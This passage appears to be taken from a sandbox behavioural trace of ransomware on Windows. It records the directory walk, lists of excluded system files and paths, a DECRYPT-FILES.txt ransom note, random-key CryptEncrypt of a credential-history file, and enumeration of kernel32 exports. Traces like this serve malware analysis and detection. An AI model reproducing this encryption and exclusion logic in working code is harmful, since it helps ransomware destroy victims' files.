cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.697] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.697] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x510b16f0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeed3c2e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeed3c2e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.697] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.697] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.697] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeed3c2e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeed3c2e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeed3c2e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.698] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.698] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.698] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.698] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.698] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.698] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.698] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.698] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.698] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.698] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.698] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.698] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.698] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.698] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.698] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.698] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\") returned 62 [0180.698] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.698] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\" [0180.698] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\0a16c9.tmp" [0180.698] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.698] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\proof\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.698] CloseHandle (hObject=0x0) returned 0 [0180.698] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.699] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaacf9740, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaacf9740, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaacf9740, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.699] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.699] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaacf9740, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaacf9740, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaacf9740, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.699] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.699] CloseHandle (hObject=0x26c) returned 1 [0180.699] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaaf80ea0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaf80ea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0180.699] lstrcmpW (lpString1="Protect", lpString2=".") returned 1 [0180.699] lstrcmpW (lpString1="Protect", lpString2="..") returned 1 [0180.699] lstrcatW (in: lpString1="Protect", lpString2="\\" | out: lpString1="Protect\\") returned="Protect\\" [0180.699] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Protect\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\" [0180.699] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\Program Files") returned 0x0 [0180.699] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch=":\\Windows") returned 0x0 [0180.699] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\Games\\") returned 0x0 [0180.699] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.699] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.699] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.699] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.699] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.699] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\All Users") returned 0x0 [0180.699] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.699] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.699] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.699] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="AhnLab") returned 0x0 [0180.699] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.699] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\") returned 64 [0180.699] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.700] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\\\0a16c9.tmp") returned 75 [0180.700] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.702] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\") returned 64 [0180.702] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.702] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\\\DECRYPT-FILES.txt") returned 82 [0180.702] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.703] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\") returned 64 [0180.703] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\*" [0180.703] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeed3c2e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeed3c2e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.703] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.703] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeed3c2e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeed3c2e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.703] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.703] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.703] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeed3c2e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeed3c2e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeed3c2e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.703] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.703] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.703] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.704] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.704] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.704] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.704] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.704] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.704] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.704] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.704] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.704] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.704] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.704] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.704] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.704] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\") returned 64 [0180.704] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.704] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\" [0180.704] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\0a16c9.tmp" [0180.704] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.704] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.705] CloseHandle (hObject=0x0) returned 0 [0180.705] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.705] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaad1f8a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x240, dwReserved0=0x0, dwReserved1=0x0, cFileName="CREDHIST.FV3Rc5O", cAlternateFileName="CREDHI~1.FV3")) returned 1 [0180.705] lstrcmpiW (lpString1="CREDHIST.FV3Rc5O", lpString2="DECRYPT-FILES.txt") returned -1 [0180.705] lstrcmpiW (lpString1="CREDHIST.FV3Rc5O", lpString2="autorun.inf") returned 1 [0180.705] lstrcmpiW (lpString1="CREDHIST.FV3Rc5O", lpString2="boot.ini") returned 1 [0180.705] lstrcmpiW (lpString1="CREDHIST.FV3Rc5O", lpString2="desktop.ini") returned -1 [0180.705] lstrcmpiW (lpString1="CREDHIST.FV3Rc5O", lpString2="ntuser.dat") returned -1 [0180.705] lstrcmpiW (lpString1="CREDHIST.FV3Rc5O", lpString2="iconcache.db") returned -1 [0180.705] lstrcmpiW (lpString1="CREDHIST.FV3Rc5O", lpString2="bootsect.bak") returned 1 [0180.705] lstrcmpiW (lpString1="CREDHIST.FV3Rc5O", lpString2="ntuser.dat.log") returned -1 [0180.705] lstrcmpiW (lpString1="CREDHIST.FV3Rc5O", lpString2="thumbs.db") returned -1 [0180.705] lstrcmpiW (lpString1="CREDHIST.FV3Rc5O", lpString2="Bootfont.bin") returned 1 [0180.705] lstrlenW (lpString="CREDHIST.FV3Rc5O") returned 16 [0180.705] lstrcmpiW (lpString1="FV3Rc5O", lpString2="lnk") returned -1 [0180.705] lstrcmpiW (lpString1="FV3Rc5O", lpString2="exe") returned 1 [0180.705] lstrcmpiW (lpString1="FV3Rc5O", lpString2="sys") returned -1 [0180.705] lstrcmpiW (lpString1="FV3Rc5O", lpString2="dll") returned 1 [0180.705] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\") returned 64 [0180.705] lstrlenW (lpString="CREDHIST.FV3Rc5O") returned 16 [0180.705] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\" [0180.705] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="CREDHIST.FV3Rc5O" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.FV3Rc5O") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.FV3Rc5O" [0180.705] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.706] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.FV3Rc5O" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\credhist.fv3rc5o"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274 [0180.707] GetFileSizeEx (in: hFile=0x274, lpFileSize=0x36fdd30 | out: lpFileSize=0x36fdd30*=576) returned 1 [0180.707] CreateFileMappingW (hFile=0x274, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x278 [0180.707] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.707] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0180.707] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0180.707] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.708] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fdc98*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fdc98*=0x100) returned 1 [0180.708] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0180.709] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.709] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.709] CloseHandle (hObject=0x278) returned 1 [0180.709] SetFilePointerEx (in: hFile=0x274, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.709] WriteFile (in: hFile=0x274, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fdcb8, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fdcb8*=0x108, lpOverlapped=0x0) returned 1 [0180.710] CloseHandle (hObject=0x0) returned 0 [0180.710] CloseHandle (hObject=0x274) returned 1 [0180.710] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.710] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.711] GetTickCount () returned 0x11349dd [0180.711] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.711] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0180.711] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0180.711] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.711] lstrlenA (lpString="kernel32.dll") returned 12 [0180.711] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0180.712] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0180.712] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0180.712] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0180.712] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0180.712] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0180.712] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0180.712] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0180.712] lstrlenA (lpString="ADDATOMA") returned 8 [0180.712] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0180.712] lstrlenA (lpString="ADDATOMW") returned 8 [0180.712] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0180.712] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0180.712] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0180.712] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0180.712] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0180.712] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0180.712] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0180.712] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0180.712] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0180.712] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0180.712] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0180.712] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0180.712] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0180.712] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0180.712] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0180.712] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0180.712] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0180.712] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0180.712] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0180.712] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0180.712] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0180.712] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0180.712] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0180.712] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0180.712] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0180.712] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0180.712] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0180.713] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0180.713] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0180.713] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0180.713] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0180.713] lstrlenA 